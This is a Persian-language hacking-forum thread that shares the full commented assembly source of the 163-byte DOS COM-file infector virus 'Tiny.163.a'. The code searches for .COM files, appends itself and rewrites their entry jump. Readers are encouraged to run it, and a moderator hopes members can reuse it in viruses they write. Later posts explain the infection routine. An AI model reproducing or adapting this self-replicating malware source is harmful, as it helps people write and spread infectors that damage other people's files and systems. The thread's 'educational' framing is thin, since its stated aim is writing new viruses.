ايران ويج » هك وكرك و ويروس » ويروس و آنتي ويروس » ويروس v
» سورس ویروس tiny.163.a

امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
سورس ویروس tiny.163.a
نویسنده پیام
reza_g آفلاین
كاربر تک ستاره
*

ارسال‌ها: 49
موضوع‌ها: 12
تاریخ عضویت: تير ۱۳۸۶

تشکرها : 3
( 3 تشکر در 3 ارسال )
ارسال: #1
سورس ویروس tiny.163.a
این ویروس مثل اسمش 163 بایته و با اسمبلی نوشته شده و بیشتر آنتی ویروس ها هم میشناسنش.منشا این ویروس،دانمارک می باشد و بلافاصله پس از اجرا،فایل های com موجود در پوشه جاری را به روشی کاملا" پیشرفته آلوده می کند.این ویروس باید به صورت فایل com باشه و با آنتی ویروس kaspersky هم disinfect میشه.پس با خیال راحت امتحانش کنید.

هر کاری کردم سورس ویروس آپلود نشد.همین کدها رو کپی کنید:

کد:
PAGE 59,132


data_2e equ 1ABh ;start of virus

seg_a segment byte public ;
assume cs:seg_a, ds:seg_a ;assume cs, ds - code


org 100h ;orgin of all COM files
s proc far

start:
jmp loc_1 ;jump to virus


;this is a replacement for an infected file

db 0CDh, 20h, 7, 8, 9 ;int 20h
;pop es

loc_1:
call sub_1 ;



s endp


sub_1 proc near ;
pop si ;locate all virus code via
sub si,10Bh ;si, cause all offsets will
mov bp,data_1[si] ;change when virus infects
add bp,103h ;a COM file
lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI
xor cx,cx ;clear cx - find only normal
;attributes
mov ah,4Eh ;find first file
loc_2:
int 21h ;

jc loc_6 ;no files found? then quit
mov dx,9Eh ;offset of filename found
mov ax,3D02h ;open file for read/write access
int 21h ;

mov bx,ax ;save handle into bx
mov ah,3Fh ;read from file
lea dx,[si+1A8h] ;offset of save buffer
mov di,dx ;
mov cx,3 ;read three bytes
int 21h ;

cmp byte ptr [di],0E9h ;compare buffer to virus id
;string
je loc_4 ;
loc_3:
mov ah,4Fh ;find the next file
jmp short loc_2 ;and test it
loc_4:
mov dx,[di+1] ;lsh of offset
mov data_1[si],dx ;
xor cx,cx ;msh of offset
mov ax,4200h ;set the file pointer
int 21h ;

mov dx,di ;buffer to save read
mov cx,2 ;read two bytes
mov ah,3Fh ;read from file
int 21h ;

cmp word ptr [di],807h ;compare buffer to virus id
je loc_3 ;same? then find another file

;heres where we infect a file

xor dx,dx ;set file pointer
xor cx,cx ;ditto
mov ax,4202h ;set file pointer
int 21h ;

cmp dx,0 ;returns msh
jne loc_3 ;not the same? find another file
cmp ah,0FEh ;lsh = 254???
jae loc_3 ;if more or equal find another file

mov ds:data_2e[si],ax ;point to data
mov ah,40h ;write to file
lea dx,[si+105h] ;segment:offset of write buffer
mov cx,0A3h ;write 163 bytes
int 21h ;

jc loc_5 ;error? then quit
mov ax,4200h ;set file pointer
xor cx,cx ;to the top of the file
mov dx,1 ;
int 21h ;

mov ah,40h ;write to file
lea dx,[si+1ABh] ;offset of jump to virus code
mov cx,2 ;two bytes
int 21h ;

;now close the file

loc_5:
mov ah,3Eh ;close file
int 21h ;

loc_6:
jmp bp ;jump to original file

data_1 dw 0 ;
db '*.COM',0 ;wild card search string


sub_1 endp
seg_a ends
end start
(آخرین ویرایش در این ارسال: ۲۶-آبان-۱۳۸۸, ۱۵:۴۸:۵۹، توسط lord_viper.)
۲۶-تير-۱۳۸۶, ۰۶:۰۰:۳۰
ارسال‌ها
پاسخ
تشکر شده توسط : Scorpion
reza_g آفلاین
كاربر تک ستاره
*

ارسال‌ها: 49
موضوع‌ها: 12
تاریخ عضویت: تير ۱۳۸۶

تشکرها : 3
( 3 تشکر در 3 ارسال )
ارسال: #2
RE: سورس ویروس tiny.163.a
به زودی سورس tiny.b رو هم میذارم
۲۶-تير-۱۳۸۶, ۰۶:۰۳:۴۳
ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #3
RE: سورس ویروس tiny.163.a
دوست عزیز ممنون از زحمتی که کشیدی ولی ای کاش در مورد قسمتهای مختلف و نحوه کار اون هم توضیح می دادی تا با فهم این سورس بتونیم در آینده اونو در ویروس هایی که می نویسیم استفاده کنیم.
این سورس جهت تعلیم و آموزش آماده شده بوده و به همین دلیل تفاوتهایی با سورس اصلی ویروس داره و می شه گفت این نمونه ضعیف شده ویروس اصلی هست که به سیستم عامل صدمه نمی زنه. در ضمن این ویروس هم سن بابای من هست و فقط تحت داس اجرا می شه

آغازی برای کرک
کرک قفل تلفنی
کارگاه آموزش کرک
دانلود ابزارهای کرک
استفاده از IDA‌ براي آنپك كردن يك برنامه "حرف نشنو"!
سورس ويروس، كرم ،‌تروجان
۲۶-تير-۱۳۸۶, ۱۱:۰۴:۴۶
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : Scorpion
reza_g آفلاین
كاربر تک ستاره
*

ارسال‌ها: 49
موضوع‌ها: 12
تاریخ عضویت: تير ۱۳۸۶

تشکرها : 3
( 3 تشکر در 3 ارسال )
ارسال: #4
RE: سورس ویروس tiny.163.a
باشه من هر چی بلدم میگم.
این ویروس از وقفه 21h ،تابع 4eh برای پیدا کردن فایل های com استفاده میکنه و از تابه 40h و وقفه 21h برای نوشتن در فایل استفاده می کنه و زمان ایجاد فایل رو هم برنمی گردونه و همچنین فایل های دارای attribute عادی رو برای آلوده کردن پیدا میکنه در صورتی که ویروس های حرفه ای،فایل های readonly را هم آلوده کرده و سپس دوباره بعد از آلوده سازی آن ها را readonly می کنند و attributes فایل رو کامل برمیگردونن.تنها مزیتی که داره اینه که روش خیلی خوب و پیچیده ای برای آلوده کردن داره که من ازش سر در نیاوردم.
۲۶-تير-۱۳۸۶, ۱۸:۲۷:۳۶
ارسال‌ها
پاسخ


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  ویروس Indian grl.avi.exe salehjg 6 19,801 ۰۴-آذر-۱۳۹۴, ۱۷:۵۶:۴۹
آخرین ارسال: alimogmov
  ویروس aleas 26 24,327 ۰۵-مهر-۱۳۹۳, ۲۱:۲۳:۵۱
آخرین ارسال: STR_virus
  ویروس جدید!!! hadikh73 9 7,298 ۰۴-اسفند-۱۳۹۲, ۱۳:۰۸:۵۶
آخرین ارسال: godvb
  درخواست سورس چند تا ویروس به زبان c jaber 9 11,122 ۲۲-شهریور-۱۳۹۲, ۱۲:۳۷:۱۴
آخرین ارسال: Ghoghnus
  ویروس الوده کننده فایل های اجرایی elsecret 3 5,547 ۱۹-شهریور-۱۳۹۲, ۱۱:۵۲:۰۱
آخرین ارسال: kogo
  [پروژه] سورس چند ویروس Fery666 6 6,587 ۰۷-شهریور-۱۳۹۲, ۱۷:۵۷:۴۲
آخرین ارسال: Ghoghnus
  درخواست سورس ویروس زمانی rap0661 3 5,221 ۳۰-اردیبهشت-۱۳۹۲, ۱۰:۴۳:۳۲
آخرین ارسال: A.P-H@ck3r
  ویروس نویسی با چی؟ mohamadpk 13 16,816 ۳۰-اردیبهشت-۱۳۹۲, ۱۰:۰۷:۱۸
آخرین ارسال: A.P-H@ck3r
  ویروس funny.exe abbasalifix 23 23,891 ۲۸-اردیبهشت-۱۳۹۲, ۱۴:۴۰:۳۷
آخرین ارسال: A.P-H@ck3r
  ویروس چندریخت حمزه 327 5 5,863 ۰۹-فروردین-۱۳۹۲, ۲۳:۵۴:۲۱
آخرین ارسال: A.P-H@ck3r

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS